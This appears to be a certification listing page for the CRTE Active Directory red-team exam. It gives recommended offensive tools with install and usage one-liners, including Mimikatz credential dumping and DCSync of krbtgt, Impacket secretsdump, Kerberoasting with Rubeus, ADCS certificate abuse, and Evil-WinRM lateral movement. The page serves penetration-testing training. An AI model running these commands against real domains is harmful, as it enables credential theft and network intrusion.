CRTE
Altered Security

Certified Red Team Expert

Advanced 48hr practical AD lab exam Pass: Passing $249

Active Directory red teaming — Kerberoasting, DCSync, BloodHound, lateral movement.

Official Page
IssuerAltered Security
Format48hr practical AD lab exam
Duration48 hours
Pass ScorePassing
Overview Syllabus (8) Tools (7) Cheat Sheets (2) Labs (1)
Recommended Tools
CrackMapExec Essential
AD Attacks

AD pentesting swiss army knife

installpip3 install crackmapexec
usagecme smb target -u user -p pass --sam; cme winrm target -u admin -p pass
Impacket Essential
AD Attacks

Python AD attack toolkit

installpip3 install impacket
usagesecretsdump.py domain/admin@dc; GetUserSPNs.py domain/user:pass -dc-ip dc
Certify Essential
ADCS

AD CS certificate abuse enumeration

installCompile from source
usageCertify.exe find /vulnerable; Certify.exe request /ca:CA /template:Vuln
Certipy Essential
ADCS

Python ADCS attack tool

installpip3 install certipy-ad
usagecertipy find -u user@domain -p pass -dc-ip dc; certipy req -u user@domain -p pass -ca CA -template Vuln
Invoke-Mimikatz Essential
Credentials

PowerShell port of Mimikatz

installImport-Module Invoke-Mimikatz.ps1
usageInvoke-Mimikatz -Command "sekurlsa::logonpasswords"
Mimikatz Essential
Credentials

Credential extraction from Windows memory

installDownload from github
usagesekurlsa::logonpasswords; lsadump::dcsync /user:krbtgt
AD Module Essential
Enumeration

Microsoft RSAT AD module for stealthy enumeration

installImport-Module ActiveDirectory
usageGet-ADUser -Filter *; Get-ADComputer -Filter * -Properties *
BloodHound Essential
Enumeration

AD attack path visualization

installsudo apt install bloodhound
usagebloodhound-python -d domain -u user -p pass -c all
PowerView Essential
Enumeration

PowerShell AD enumeration framework

installImport-Module PowerView.ps1
usageGet-DomainUser -SPN; Get-DomainTrust; Find-LocalAdminAccess
Rubeus Essential
Kerberos

Kerberos interaction and abuse

installCompile from source
usageRubeus.exe kerberoast; Rubeus.exe asktgt /user:svc /rc4:hash
Evil-WinRM Essential
Lateral

WinRM pentesting shell

installgem install evil-winrm
usageevil-winrm -i target -u user -p pass -s /scripts/
PowerUpSQL Essential
MSSQL

MSSQL pentesting toolkit

installImport-Module PowerUpSQL.ps1
usageGet-SQLInstanceDomain; Invoke-SQLEscalatePriv